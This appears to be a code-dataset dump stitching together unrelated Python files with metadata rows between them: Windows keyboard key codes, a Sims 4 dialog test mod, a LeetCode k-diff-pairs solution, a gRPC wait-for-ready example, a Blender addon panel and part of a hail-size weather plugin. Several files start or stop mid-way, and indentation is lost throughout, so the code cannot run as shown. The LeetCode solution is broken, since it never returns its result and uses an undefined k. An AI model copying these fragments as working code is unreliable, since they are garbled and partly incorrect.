CTRL_F5 = '\x00b'
CTRL_F6 = '\x00c'
CTRL_F7 = '\x00d' # Captured by something?
CTRL_F8 = '\x00e'
CTRL_F9 = '\x00f'
CTRL_F10 = '\x00g'
CTRL_F11 = '\xe0\x89'
CTRL_F12 = '\xe0\x8a'
CTRL_HOME = '\xe0w'
CTRL_END = '\xe0u'
CTRL_INSERT = '\xe0\x92'
CTRL_DELETE = '\xe0\x93'
CTRL_PAGE_DOWN = '\xe0v'
CTRL_2 = '\x00\x03'
CTRL_UP = '\xe0\x8d'
CTRL_DOWN = '\xe0\x91'
CTRL_LEFT = '\xe0s'
CTRL_RIGHT = '\xe0t'
CTRL_ALT_A = '\x00\x1e'
CTRL_ALT_B = '\x000'
CTRL_ALT_C = '\x00.'
CTRL_ALT_D = '\x00 '
CTRL_ALT_E = '\x00\x12'
CTRL_ALT_F = '\x00!'
CTRL_ALT_G = '\x00"'
CTRL_ALT_H = '\x00#'
CTRL_ALT_I = '\x00\x17'
CTRL_ALT_J = '\x00$'
CTRL_ALT_K = '\x00%'
CTRL_ALT_L = '\x00&'
CTRL_ALT_M = '\x002'
CTRL_ALT_N = '\x001'
CTRL_ALT_O = '\x00\x18'
CTRL_ALT_P = '\x00\x19'
CTRL_ALT_Q = '\x00\x10'
CTRL_ALT_R = '\x00\x13'
CTRL_ALT_S = '\x00\x1f'
CTRL_ALT_T = '\x00\x14'
CTRL_ALT_U = '\x00\x16'
CTRL_ALT_V = '\x00/'
CTRL_ALT_W = '\x00\x11'
CTRL_ALT_X = '\x00-'
CTRL_ALT_Y = '\x00\x15'
CTRL_ALT_Z = '\x00,'
CTRL_ALT_1 = '\x00x'
CTRL_ALT_2 = '\x00y'
CTRL_ALT_3 = '\x00z'
CTRL_ALT_4 = '\x00{'
CTRL_ALT_5 = '\x00|'
CTRL_ALT_6 = '\x00}'
CTRL_ALT_7 = '\x00~'
CTRL_ALT_8 = '\x00\x7f'
CTRL_ALT_9 = '\x00\x80'
CTRL_ALT_0 = '\x00\x81'
CTRL_ALT_MINUS = '\x00\x82'
CTRL_ALT_EQUALS = '\x00x83'
CTRL_ALT_BACKSPACE = '\x00\x0e'
ALT_F1 = '\x00h'
ALT_F2 = '\x00i'
ALT_F3 = '\x00j'
ALT_F4 = '\x00k'
ALT_F5 = '\x00l'
ALT_F6 = '\x00m'
ALT_F7 = '\x00n'
ALT_F8 = '\x00o'
ALT_F9 = '\x00p'
ALT_F10 = '\x00q'
ALT_F11 = '\xe0\x8b'
ALT_F12 = '\xe0\x8c'
ALT_HOME = '\x00\x97'
ALT_END = '\x00\x9f'
ALT_INSERT = '\x00\xa2'
ALT_DELETE = '\x00\xa3'
ALT_PAGE_UP = '\x00\x99'
ALT_PAGE_DOWN = '\x00\xa1'
ALT_LEFT = '\x00\x9b'
ALT_RIGHT = '\x00\x9d'
ALT_UP = '\x00\x98'
ALT_DOWN = '\x00\xa0'
CTRL_ALT_LEFT_BRACKET = '\x00\x1a'
CTRL_ALT_RIGHT_BRACKET = '\x00\x1b'
CTRL_ALT_SEMICOLON = '\x00\''
CTRL_ALT_SINGLE_QUOTE = '\x00('
CTRL_ALT_ENTER = '\x00\x1c'
CTRL_ALT_SLASH = '\x005'
CTRL_ALT_PERIOD = '\x004'
CTRL_ALT_COMMA = '\x003'
class ControlKeys(object):
def __init__(self, format='CTRL_{}'):
for i in range(0x20):
low_char = chr(i)
high_char = chr(i + 0x40)
name = ASCII_NAMES.get(high_char, high_char).upper()
ctrl_name = format.format(name)
setattr(self, ctrl_name, low_char)
class AsciiKeys(object):
def __init__(
self,
lower_format='{}', upper_format='SHIFT_{}', digit_format='N{}',
ascii_names=ASCII_NAMES,
):
for letter in string.ascii_lowercase:
name = lower_format.format(letter.upper())
setattr(self, name, letter)
for letter in string.ascii_uppercase:
name = upper_format.format(letter.upper())
setattr(self, name, letter)
for digit in string.digits:
name = digit_format.format(digit)
setattr(self, name, digit)
for char, name in ascii_names.items():
name = name.upper().replace(' ', '_')
setattr(self, name, char)
class Keys(object):
def __init__(self, keyclasses):
self.__names = dict() # Map of codes -> names
self.__codes = dict() # Map of names -> codes
self.__escapes = set()
for keyclass in keyclasses:
for name in dir(keyclass):
if self._is_key_name(name):
code = getattr(keyclass, name)
self.register(name, code)
def register(self, name, code):
if name not in self.__codes:
self.__codes[name] = code
if code not in self.__names:
self.__names[code] = name
for i in range(len(code)):
self.__escapes.add(code[:i])
# Update towards canonicity
while True:
canon_code = self.canon(code)
canon_canon_code = self.canon(canon_code)
if canon_code != canon_canon_code:
self.__codes[self.name(code)] = canon_canon_code
else:
break
while True:
canon_name = self.name(self.code(name))
canon_canon_name = self.name(self.code(canon_name))
if canon_name != canon_canon_name:
self.__names[self.code(name)] = canon_canon_name
else:
break
@property
def escapes(self):
return self.__escapes
@property
def names(self):
return self.__codes.keys()
def name(self, code):
return self.__names.get(code)
def code(self, name):
return self.__codes.get(name)
def canon(self, code):
name = self.name(code)
return self.code(name) if name else code
def __getattr__(self, name):
code = self.code(name)
if code is not None:
return code
else:
return self.__getattribute__(name)
def _is_key_name(self, name):
return name == name.upper() and not name.startswith('_')
windows_keys = Keys([
WindowsKeys(),
AsciiKeys(),
ControlKeys(),
UnicodeAsciiKeys(),
JargonKeys(),
IntercalKeys()
])
PLATFORM_KEYS = {
'windows': windows_keys,
}
class Platform(object):
def __init__(self, keys=None, interrupts=None):
keys = keys or self.KEYS
if isinstance(keys, str):
keys = PLATFORM_KEYS[keys]
self.key = self.keys = keys
if interrupts is None:
interrupts = self.INTERRUPTS
self.interrupts = {
self.keys.code(name): action
for name, action in interrupts.items()
}
assert (
self.__class__.getchar != Platform.getchar or
self.__class__.getchars != Platform.getchars
)
def getkey(self, blocking=True):
buffer = ''
for c in self.getchars(blocking):
buffer += str(c)
if buffer not in self.keys.escapes:
break
keycode = self.keys.canon(buffer)
if keycode in self.interrupts:
interrupt = self.interrupts[keycode]
if isinstance(interrupt, BaseException) or \
issubclass(interrupt, BaseException):
raise interrupt
else:
raise NotImplementedError('Unimplemented interrupt: {!r}'
.format(interrupt))
return keycode
def bang(self):
while True:
code = self.getkey(True)
name = self.keys.name(code) or '???'
print('{} = {!r}'.format(name, code))
# You MUST override at least one of the following
def getchars(self, blocking=True):
char = self.getchar(blocking)
while char:
yield char
char = self.getchar(False)
def getchar(self, blocking=True):
for char in self.getchars(blocking):
return char
else:
return None
class PlatformWindows(Platform):
KEYS = 'windows'
INTERRUPTS = {'CTRL_C': KeyboardInterrupt}
def __init__(self, keys=None, interrupts=None, msvcrt=None):
super(PlatformWindows, self).__init__(keys, interrupts)
if msvcrt is None:
import msvcrt
self.msvcrt = msvcrt
def getchars(self, blocking=True):
"""Get characters on Windows."""
if blocking:
yield self.msvcrt.getch()
while self.msvcrt.kbhit():
yield self.msvcrt.getch()
class Input_TextInputLength(HasTunableSingletonFactory, AutoFactoryInit):
__qualname__ = 'Input_TextInputLength'
def build_msg(self, dialog, msg, *additional_tokens):
msg.max_length = 255
msg.min_length = 0
msg.input_too_short_tooltip = LocalizationHelperTuning.get_raw_text("")
class DialogTestUiDialogTextInput(UiDialog):
__qualname__ = 'DialogTestUiDialogTextInput'
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.text_input_responses = {}
def on_text_input(self, text_input_name='', text_input=''):
self.text_input_responses[text_input_name] = text_input
return False
def build_msg(self, text_input_overrides=None, additional_tokens=(), **kwargs):
msg = super().build_msg(additional_tokens=additional_tokens, **kwargs)
text_input_msg1 = msg.text_input.add()
text_input_msg1.text_input_name = "userinput"
# text_input_msg1.max_length = nn
# text_input_msg1.min_length = nn
return msg
class DialogTestUiDialogTextInputOkCancel(UiDialogOkCancel, DialogTestUiDialogTextInput):
__qualname__ = 'DialogTestUiDialogTextInputOkCancel'
TEXT_INPUT_NAME = 'name'
class input_text:
DIALOG = UiDialogTextInputOkCancel.TunableFactory(text_inputs=(TEXT_INPUT_NAME,))
##
## Get input from user dialog test
##
def inputbox(title: str, text: str, callback, initial_value: str = ""):
input_text = ""
def inputbox_callback(dialog):
if dialog.accepted:
input_text = dialog.text_input_responses.get("search_terms")
callback(input_text)
else:
return
client = services.client_manager().get_first_client()
text_input = UiTextInput(sort_order=0, restricted_characters=None)
text_input.default_text = None
text_input.title = None
text_input.max_length = 255
text_input.initial_value = lambda **_: LocalizationHelperTuning.get_raw_text(initial_value)
text_input.check_profanity = False
text_input.length_restriction = Input_TextInputLength()
text_input.height = None
inputs = AttributeDict({'search_terms': text_input})
dialog = UiDialogTextInputOkCancel.TunableFactory().default(client.active_sim,
text=lambda **_: LocalizationHelperTuning.get_raw_text(
text),
title=lambda **_: LocalizationHelperTuning.get_raw_text(
title),
text_inputs=inputs)
dialog.add_listener(inputbox_callback)
dialog.show_dialog()
def get_input_callback(input_str):
client = services.client_manager().get_first_client()
sim_info = client.active_sim.sim_info
ld_notice(sim_info, "get_input_callback", input_str)
##
## Ok/Cancel dialog test
##
@sims4.commands.Command('dialogtest.okcancel', command_type=sims4.commands.CommandType.Live)
def dialogtest_okcancel(_connection=None):
output = sims4.commands.CheatOutput(_connection)
def dialogtest_okcancel_callback(dialog):
if dialog.accepted:
output("User pressed OK")
else:
output("User pressed CANCEL")
title = "Dialog Test 1"
text = "Please press OK to continue, or Cancel."
client = services.client_manager().get_first_client()
dialog = UiDialogOkCancel.TunableFactory().default(client.active_sim,
text=lambda **_: LocalizationHelperTuning.get_raw_text(text),
title=lambda **_: LocalizationHelperTuning.get_raw_text(title))
dialog.add_listener(dialogtest_okcancel_callback)
dialog.show_dialog() | AlinaNikitina1703/Sims4ScriptCore | Scripts/scripts_core/sc_input.py | sc_input.py | py | 20,564 | python | en | code | 2 | github-code | 90 |
19012755735 | class Solution:
def __method1 (self, nums):
nums.sort()
i, j, count = 0, 1, 0
while (j < len(nums)):
diff = nums[j] - nums[i]
if (diff == k):
count += 1
while (((j + 1) < len(nums)) and (nums[j] == nums[j + 1])): j += 1
j += 1
elif (diff > k): i += 1
else: j += 1
if (i == j): j += 1
return count
def __method2 (self, nums):
hm, count = {}, 0
for num in nums:
if (num not in hm): hm[num] = 0
hm[num] += 1
for key in hm.keys():
if (((k > 0) and ((key + k) in hm)) or ((k == 0) and (hm[key] > 1))): count += 1
return count
def findPairs (self, nums: List[int], k: int) -> int:
self.__method1(nums)
# self.__method2(nums)
| Tejas07PSK/fraz-leetcode-hot-250 | Array/k_diff_pairs_in_arr.py | k_diff_pairs_in_arr.py | py | 857 | python | en | code | 1 | github-code | 90 |
25562601764 | from concurrent import futures
from contextlib import contextmanager
import logging
import socket
import threading
import grpc
helloworld_pb2, helloworld_pb2_grpc = grpc.protos_and_services(
"helloworld.proto"
)
_LOGGER = logging.getLogger(__name__)
_LOGGER.setLevel(logging.INFO)
@contextmanager
def get_free_loopback_tcp_port():
if socket.has_ipv6:
tcp_socket = socket.socket(socket.AF_INET6)
else:
tcp_socket = socket.socket(socket.AF_INET)
tcp_socket.bind(("", 0))
address_tuple = tcp_socket.getsockname()
yield "localhost:%s" % (address_tuple[1])
tcp_socket.close()
class Greeter(helloworld_pb2_grpc.GreeterServicer):
def SayHello(self, request, unused_context):
return helloworld_pb2.HelloReply(message="Hello, %s!" % request.name)
def create_server(server_address):
server = grpc.server(futures.ThreadPoolExecutor())
helloworld_pb2_grpc.add_GreeterServicer_to_server(Greeter(), server)
bound_port = server.add_insecure_port(server_address)
assert bound_port == int(server_address.split(":")[-1])
return server
def process(stub, wait_for_ready=None):
try:
response = stub.SayHello(
helloworld_pb2.HelloRequest(name="you"),
wait_for_ready=wait_for_ready,
)
message = response.message
except grpc.RpcError as rpc_error:
assert rpc_error.code() == grpc.StatusCode.UNAVAILABLE
assert not wait_for_ready
message = rpc_error
else:
assert wait_for_ready
_LOGGER.info(
"Wait-for-ready %s, client received: %s",
"enabled" if wait_for_ready else "disabled",
message,
)
def main():
# Pick a random free port
with get_free_loopback_tcp_port() as server_address:
# Register connectivity event to notify main thread
transient_failure_event = threading.Event()
def wait_for_transient_failure(channel_connectivity):
if (
channel_connectivity
== grpc.ChannelConnectivity.TRANSIENT_FAILURE
):
transient_failure_event.set()
# Create gRPC channel
channel = grpc.insecure_channel(server_address)
channel.subscribe(wait_for_transient_failure)
stub = helloworld_pb2_grpc.GreeterStub(channel)
# Fire an RPC without wait_for_ready
thread_disabled_wait_for_ready = threading.Thread(
target=process, args=(stub, False)
)
thread_disabled_wait_for_ready.start()
# Fire an RPC with wait_for_ready
thread_enabled_wait_for_ready = threading.Thread(
target=process, args=(stub, True)
)
thread_enabled_wait_for_ready.start()
# Wait for the channel entering TRANSIENT FAILURE state.
transient_failure_event.wait()
server = create_server(server_address)
server.start()
# Expected to fail with StatusCode.UNAVAILABLE.
thread_disabled_wait_for_ready.join()
# Expected to success.
thread_enabled_wait_for_ready.join()
server.stop(None)
channel.close()
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
main()
| grpc/grpc | examples/python/wait_for_ready/wait_for_ready_example.py | wait_for_ready_example.py | py | 3,186 | python | en | code | 39,468 | github-code | 90 |
25712179134 | import bpy, platform
from functions import *
class TrackPanel(bpy.types.Panel):
'''class of the panel who contains addon control'''
bl_space_type = "CLIP_EDITOR"
bl_region_type = "TOOLS"
bl_label = "Single track"
bl_category = "Curve Anim"
def draw(self, context):
'''the function that draw the addon UI'''
layout = self.layout
# check if there is a movie clip set
if(context.space_data.clip is not None):
clip = context.space_data.clip
# draw panel
clip.curve_to_frame.draw_panel(context, layout, clip)
else:
# Display a request for a movie clip
row = layout.row()
row.label(
text="select/load an images sequence in Movie Editor.",
icon="ERROR" )
row = layout.row()
row.template_ID(context.space_data, 'clip', open='clip.open' )
class Panel():
'''Class containing all needed methods to draw panel'''
def draw_panel(self, context, layout, clip):
'''Draw the single track panel layout'''
# draw movieclip load error if required
error = self.draw_load_error( layout, clip )
if not error:
refresh_curve = "curve_to_frame.generate_single_track_curves"
refresh_mini_maxi =\
"curve_to_frame.single_track_get_amplitude_range"
restore_peak_shape =\
"curve_to_frame.single_track_default_peak_shape"
run_operator = "curve_to_frame.render_single_track"
# draw Movie info & settings
self.draw_track_info( layout )
# draw amplitude settings
self.draw_amplitude( layout,
refresh_curve, refresh_mini_maxi )
# draw peaks rythm settings
self.draw_peak(layout, refresh_curve )
# draw peaks profile settings
self.draw_peak_shape( layout, refresh_curve,
restore_peak_shape )
# draw combination node settings and combination and output value
self.draw_combination( layout, refresh_curve )
# draw run button or error message
self.draw_run_button( layout, run_operator, context.scene )
def draw_load_error(self, layout, clip):
'''Draw track load error part of single track panel'''
if(clip.source != 'SEQUENCE'):
# Display an error message, requesting for a sequence of images
row = layout.row()
row.label( text="Current movie can't be use by addon.",
icon="ERROR" )
row = layout.row()
row.label( text="Only images sequence are accept." )
row = layout.row()
row.template_ID(bpy.context.space_data, 'clip', open='clip.open' )
return True
elif(not self.init):
# ask to initialize curve to frame on thes MovieClip
row = layout.row()
row.operator(
"curve_to_frame.init_track",
text="initialize MovieClip info")
return True
return False
def draw_track_info(self, layout):
'''Draw track info and settings part of single and multi track panels'''
# Display the directory path
row = layout.row()
col = row.column()
col.label( text = "Frame Directory path:" )
col = row.column()
col.operator(
"curve_to_frame.init_track",
icon = 'FILE_REFRESH',
text = '')
row = layout.row()
row.label( text= self.path )
# Display frame extension
row = layout.row()
col = row.column()
col.label( text="File type: "+self.ext )
# Display first to last accepted frame name range
col = row.column()
col.label( text="Valid frames: "\
+self.get_frame_name(self.first)+' to '\
+self.get_frame_name(self.last) )
# Display Start/End settings
layout.separator()
row = layout.row()
col = row.column()
col.prop(self, "start")
col = row.column()
col.prop(self, "end")
layout.separator()
def draw_amplitude(
self,
layout,
refresh_curve,
refresh_mini_maxi):
'''Draw amplitude settings part of single and multi track panels'''
# A float amplitude field
row = layout.row()
col = row.column()
col.prop(self, "amplitude")
# A field to remind F-Curve min and max value
fCurve = get_fcurve_by_data_path(self.id_data, 'curve_to_frame.amplitude')
if(fCurve is None):
m = M = self.amplitude
else:
m, M = get_curve_limit(fCurve)
m = round(m*1000)/1000
M = round(M*1000)/1000
col = row.column()
col.label( text = "(Goes from "+str(m)\
+" to "+str(M)+')' )
# A field to set the min F-Curve Value to
# assigne to the first frames
row = layout.row()
col = row.column()
col.prop(self, "mini")
# A field to set the max F-Curve Value to
# assigne to the last frames
col = row.column()
col.prop(self, "maxi")
if(self.combination_mode == 'ignore_amplitude'):
col.enabled = False
# A button to get curve min max value
col = row.column()
col.operator(refresh_mini_maxi,
text = 'auto')
# display net amplitude value
col = row.column()
col.enabled = False
col.prop(self, "amplitude_net")
col = row.column()
col.operator(
refresh_curve,
text='',
icon='FILE_REFRESH')
def draw_peak(self, layout, refresh_curve):
'''Draw peak rate settings part of single and multi track panels'''
# peaks rate settings
layout.separator()
row = layout.row()
col = row.column()
col.prop(self, "rate")
col = row.column()
col.prop(self, "rate_unit", text='')
col = row.column()
col.prop(self, "auto_constant")
col = row.column()
col.prop(self, "accuracy")
# amplitude synchronized settings
row = layout.row()
col = row.column()
col.prop(self, "synchronized")
col = row.column()
if (not self.synchronized):
col.enabled = False
col.prop(self, "anticipate")
# resuling settings
col = row.column()
col.enabled = False
col.prop(self, "peaks")
col = row.column()
col.operator(
refresh_curve,
text='',
icon='FILE_REFRESH')
def draw_peak_shape(
self,
layout,
refresh_curve,
restore_shape
):
'''Draw peak shape settings part of single and multi track panels'''
layout.separator()
row = layout.row()
# restore default shape button
col = row.column()
col.operator(
restore_shape,
text='',
icon='LOAD_FACTORY')
# display peaks shapes settings
col = row.column()
col.prop(self, "peaks_shape")
col = row.column()
col.prop(self, "peaks_shape_range_start")
col = row.column()
col.prop(self, "peaks_shape_range_end")
# refresh curve
col = row.column()
col.operator(
refresh_curve,
text='',
icon='FILE_REFRESH')
def draw_combination(
self,
layout,
refresh_curve,
no_output=False ):
'''Draw combination settings part of single and multi track panels'''
# combination mode field
layout.separator()
row = layout.row()
col = row.column()
col.prop(self, 'combination_mode')
# visualize combination of peaks and amplitude curve
col = row.column()
col.enabled = False
col.prop(self, "combination")
row = layout.row()
# visualize output frame
if not no_output:
col = row.column()
col.enabled = False
col.prop(self, "output")
# refresh curve
col = row.column()
col.operator(
refresh_curve,
text='',
icon='FILE_REFRESH')
layout.separator()
def draw_run_button( self, layout, run_operator, scene ):
'''Draw single track run button and warning message'''
warning = (not scene.ctf_real_copy \
and platform.system().lower() not in ['linux', 'unix'])
row = layout.row()
col = row.column()
if( check_driver(self.id_data, 'curve_to_frame.' ) ):
# check no driver is use on curve to frame property
col.label(text='This function can\'t be used with driver!',
icon='ERROR')
elif(warning):
# check there is no warning
col.operator(
run_operator,
text="ignore warning and run at my one risk",
icon = 'ERROR')
# A checkbox to get real frame file copy
col = row.column()
col.prop( scene, "ctf_real_copy", icon='ERROR' )
warning = True
else:
# draw standart run button
col.operator(
run_operator,
text="run")
# A checkbox to get real frame file copy
col = row.column()
col.prop( scene, "ctf_real_copy" )
| CaptainDesAstres/Frames-Animated-By-Curve | single_track/panels.py | panels.py | py | 8,053 | python | en | code | 1 | github-code | 90 |
14064465771 | from bisect import bisect_right
from typing import List, Tuple
import numpy as np
from iris.cube import Cube
from iris.exceptions import CoordinateNotFoundError
from improver import BasePlugin
from improver.metadata.utilities import (
create_new_diagnostic_cube,
generate_mandatory_attributes,
)
from improver.psychrometric_calculations.psychrometric_calculations import (
adjust_for_latent_heat,
dry_adiabatic_temperature,
saturated_humidity,
)
from improver.utilities.cube_checker import assert_spatial_coords_match
from improver.utilities.cube_extraction import ExtractPressureLevel
from improver.utilities.cube_manipulation import enforce_coordinate_ordering
class HailSize(BasePlugin):
"""Plugin to calculate the diameter of the hail stones from input cubes
cloud condensation level (ccl) temperature, cloud condensation level pressure,
temperature on pressure levels, the height of the wet bulb freezing level
above sea level and orography.
From these, the values for three other cubes are calculated:
- Temperature of the environment at 268.15K (-5 Celsius) and the
pressure level where this occurs.
- Temperature after a saturated ascent from ccl pressure to the
pressure of the environment at 268.15K (-5 Celsius).
- Temperature after a dry adiabatic descent from the pressure of the
environment at 268.15K (-5 Celsius) to the ccl pressure.
From these, two indexes are calculated as:
- Temperature after a dry adiabatic descent - the temperature of the
atmosphere at 268.15K
- Temperature after a saturated ascent - the temperature of the
atmosphere at 268.15K
These indexes can then be used to extract values of hail size depending on
the wet bulb freezing altitude. The wet bulb freezing altitude is calculated
by subtracting the orography from the wet bulb freezing altitude above sea level.
If the wet bulb freezing altitude is between 3350m and 4400m then the indexes are used
to extract an initial hail value from the first table. A second table
is then accessed to reduce the hail size. The second table is stored as a dictionary, with the
key being the wet bulb freezing altitude and each column in the associated
arrays referring to the previously calculated hail diameter being less than a pre-defined
value. An updated hail_size is then extracted and stored.
If the wet_bulb_freezing_altitude is greater than 4400m then the hail size is set to
0 and if the wet bulb_freezing_altitude is less than 3350m then the originally calculated
hail size is not altered.
Both tables are taken from Hand and Cappelluti (2011) which are a tabular versions of the
graphs from Fawbush and Miller(1953)
References
- Hand, W., and G. Cappelluti. 2011. “A global hail climatology using the UK
Met Office convection diagnosis procedure (CDP) and model analyses.”
Meteorological Applications 18: 446-458. doi:https://doi.org/10.1002/met.236
- Fawbush, E.J., and R.C. Miller. 1953. “A method for forecasting hailstone size
at the earth's surface.” Bulletin of the American Meteorological Society 34: 235-244.
doi: https://doi.org/10.1175/1520-0477-34.6.235
"""
def __init__(self, model_id_attr: str = None):
"""Sets up Class
Args:
model_id_attr:
Name of model ID attribute to be copied from source cubes to output cube
"""
self.final_order = None
self.model_id_attr = model_id_attr
(
self._wbzh_keys,
self._hail_groups,
self._updated_values,
) = self.updated_nomogram()
@staticmethod
def nomogram_values() -> np.ndarray:
"""Sets-up an array of a table containing possible diameter of hail stones(mm).
It is a transposed version of the table in Hand and Cappelluti (2011).
The axes of the table are as follows:
- Horizontal axis is calculated from two values: the temperature after a
dry adiabatic descent from the pressure of atmosphere at 268.15K to the
cloud condensation level pressure and the temperature of the atmosphere
at 268.15K. Each column represents a value calculated as the temperature
after the dry adiabatic descent minus the temperature of the atmosphere
at 268.15K rounded to the nearest 0.5K.
- The vertical axis is also calculated from two values: the temperature after
a saturated ascent from the ccl pressure to the pressure of environment at
268.15K and the temperature of the atmosphere at 268.25K.
Each row is represented by a value calculated as the temperature after
the saturated ascent minus the temperature of the atmosphere at 268.15K
rounded to the nearest 5K.
"""
lookup_nomogram = np.array(
[
[0, 0, 0, 2, 2, 5, 5, 5, 5, 5],
[0, 0, 0, 2, 5, 5, 5, 5, 10, 10],
[0, 0, 2, 2, 5, 5, 10, 10, 15, 15],
[0, 0, 2, 2, 5, 10, 15, 15, 20, 20],
[0, 0, 2, 2, 10, 15, 20, 20, 20, 20],
[0, 2, 2, 5, 15, 20, 20, 20, 25, 25],
[0, 2, 5, 10, 20, 20, 25, 25, 30, 30],
[2, 2, 10, 15, 20, 25, 30, 30, 35, 35],
[2, 5, 10, 20, 25, 30, 35, 35, 40, 40],
[2, 5, 15, 20, 30, 35, 40, 40, 45, 45],
[2, 5, 15, 20, 30, 40, 40, 40, 45, 50],
[2, 10, 20, 25, 35, 40, 45, 45, 50, 50],
[5, 10, 20, 25, 40, 40, 45, 50, 55, 55],
[5, 15, 20, 30, 40, 45, 50, 55, 60, 60],
[5, 15, 25, 30, 40, 45, 55, 60, 60, 65],
[5, 15, 25, 35, 40, 50, 55, 60, 65, 75],
[10, 15, 25, 35, 45, 50, 60, 65, 70, 80],
[10, 15, 25, 40, 45, 55, 60, 70, 80, 85],
[10, 15, 30, 40, 45, 55, 65, 75, 85, 90],
[10, 20, 30, 40, 50, 60, 70, 80, 90, 100],
[10, 20, 30, 40, 50, 60, 70, 80, 95, 105],
[10, 20, 35, 45, 50, 60, 75, 85, 100, 110],
[10, 20, 35, 45, 50, 60, 75, 90, 105, 115],
[15, 25, 35, 45, 50, 65, 80, 100, 110, 120],
[15, 25, 35, 45, 55, 65, 80, 100, 110, 120],
[15, 25, 35, 50, 55, 65, 80, 100, 110, 120],
],
np.int8,
)
return lookup_nomogram
@staticmethod
def updated_nomogram() -> Tuple[List, List, np.array]:
"""Sets up a dictionary of updated hail diameter values (mm).
The dictionary keys are the height of the wet bulb freezing level (m) where,
when accessing at some height value, it should be rounded to the nearest lower value
(e.g. 3549m should access 3350m key).
Each key has an associated list in which each element is a new hail diameter based on
the original hail size that was calculated from nomogram_values table.
Specifically each column associated hail size (mm) is [<5,<10,<20,<25,<50,<75,<100,<125].
The largest possible value where the equality still holds should be used.
If the wet bulb freezing height is less than 3350m then the original hail size is used.
If the wet bulb freezing height is greater than 4400m then all hail sizes are set to 0.
"""
lookup_dict = {
3350: [0, 5, 10, 15, 25, 50, 65, 75],
3550: [0, 0, 5, 10, 20, 20, 25, 30],
3750: [0, 0, 0, 5, 10, 15, 15, 15],
3950: [0, 0, 0, 0, 5, 10, 10, 10],
4150: [0, 0, 0, 0, 0, 0, 5, 5],
4400: [0, 0, 0, 0, 0, 0, 0, 0],
}
hail_groups = [5, 10, 20, 25, 50, 75, 100, 125]
return (
list(lookup_dict.keys()),
hail_groups,
np.array(list(lookup_dict.values())),
)
def check_cubes(
self,
ccl_temperature: Cube,
ccl_pressure: Cube,
temperature_on_pressure: Cube,
wet_bulb_zero_asl: Cube,
orography: Cube,
) -> None:
"""Checks the size and units of input cubes and enforces the standard coord order
Args:
ccl_temperature:
Cube of cloud condensation level temperature
ccl_pressure:
Cube of cloud condensation level pressure
temperature_on_pressure:
Cube of environment temperature on pressure levels
wet_bulb_zero_asl:
Cube of the height of the wet bulb freezing level above sea level
orography:
Cube of the orography height.
"""
coord_order = ["realization", "pressure"] + [
temperature_on_pressure.coord(axis=axis).name() for axis in "yx"
]
self.final_order = [c.name() for c in wet_bulb_zero_asl.dim_coords]
for cube in [
ccl_temperature,
ccl_pressure,
temperature_on_pressure,
wet_bulb_zero_asl,
orography,
]:
enforce_coordinate_ordering(cube, coord_order)
temp_slice = next(temperature_on_pressure.slices_over("pressure"))
try:
wb_slice = next(wet_bulb_zero_asl.slices_over("realization"))
except CoordinateNotFoundError:
wb_slice = wet_bulb_zero_asl
assert_spatial_coords_match([wb_slice, orography])
assert_spatial_coords_match(
[ccl_temperature, ccl_pressure, temp_slice, wet_bulb_zero_asl]
)
ccl_temperature.convert_units("K")
ccl_pressure.convert_units("Pa")
temperature_on_pressure.convert_units("K")
wet_bulb_zero_asl.convert_units("m")
orography.convert_units("m")
@staticmethod
def temperature_after_saturated_ascent_from_ccl(
ccl_temperature: Cube,
ccl_pressure: Cube,
pressure_at_268: Cube,
humidity_mixing_ratio_at_ccl: np.array,
) -> np.ndarray:
"""Calculates the temperature after a saturated ascent
from the cloud condensation level to the pressure of the atmosphere at 268.15K
Args:
ccl_temperature:
Cube of cloud condensation level temperature
ccl_pressure:
Cube of cloud condensation level pressure
pressure_at_268:
Cube of the pressure of the environment at 268.15K
humidity_mixing_ratio_at_ccl:
Array of humidity mixing ratio at the pressure of the environment at the CCL
Returns:
Cube of temperature after the saturated ascent
"""
t_dry = dry_adiabatic_temperature(
ccl_temperature.data, ccl_pressure.data, pressure_at_268.data
)
t_2, _ = adjust_for_latent_heat(
t_dry, humidity_mixing_ratio_at_ccl, pressure_at_268.data
)
return t_2
@staticmethod
def dry_adiabatic_descent_to_ccl(
ccl_pressure: Cube, temperature_at_268: Cube, pressure_at_268: Cube
) -> np.ndarray:
"""Calculates the temperature due to a dry adiabatic descent from the
pressure of the environment at 268.15K to the cloud condensation level
pressure.
Args:
ccl_pressure:
Cube of cloud condensation level pressure
temperature_at_268:
Cube of the temperature of the environment at 268.15K
pressure_at_268:
Cube of the pressure of the environment at 268.15K
Returns:
Cube of temperature after the dry adiabatic descent
"""
t_dry = dry_adiabatic_temperature(
temperature_at_268.data, pressure_at_268.data, ccl_pressure.data
)
return t_dry
def get_hail_size(
self, vertical: np.ndarray, horizontal: np.ndarray, wet_bulb_zero: np.ndarray
) -> np.ndarray:
"""Uses the lookup_table and the vertical and horizontal indexes calculated
to extract and store values from the lookup nomogram.
The hail size will be set to 0 if
1) there are masked data points,
2) vertical or horizontal values are negative,
3) the wet bulb freezing altitude is greater that 4400m.
If the wet bulb freezing altitude is greater that 3300m then the hail_size is reduced.
Args:
vertical:
An n dimensional array containing the values used to calculate the vertical indexes
horizontal:
An n dimensional array containing the values used to calculate the horizontal
indexes
wet_bulb_zero:
An n dimensional array containing the height of the wet bulb freezing level
Returns:
an n dimension array of values for the diameter of hail (mm)
"""
lookup_table = self.nomogram_values()
# Rounds the calculated horizontal value to the nearest 5 which is
# then turned into a relevant index for accessing the appropriate column.
# Rounds the calculated vertical values to the nearest 0.5 which is then
# turned into a relevant index for accessing the appropriate row.
horizontal_rounded = np.around(horizontal / 5, decimals=0) - 1
vertical_rounded = np.around(vertical * 2, decimals=0)
# clips index values to not be longer than the table
vertical_clipped = np.clip(vertical_rounded, None, len(lookup_table) - 1)
horizontal_clipped = np.clip(horizontal_rounded, None, len(lookup_table[0]) - 1)
vertical_clipped = np.ma.where(
(vertical_rounded >= 0) & (horizontal_rounded >= 0), vertical_clipped, 0
).filled(0)
horizontal_clipped = np.ma.where(
(vertical_rounded >= 0) & (horizontal_rounded >= 0), horizontal_clipped, 0
).filled(0)
hail_size = lookup_table[
vertical_clipped.astype(int), horizontal_clipped.astype(int)
]
hail_size = np.where(
wet_bulb_zero >= 3300,
self.updated_hail_size(hail_size, wet_bulb_zero),
hail_size,
)
return hail_size
def updated_hail_size(
self, hail_size: np.array, wet_bulb_height: np.array
) -> np.array:
"""Uses the updated_nomogram values dictionary to access an updated hail size
based on the original predicted hail size and a wet bulb freezing height.
Args:
hail_size:
Integers of hail diameter value taken from the original nomogram
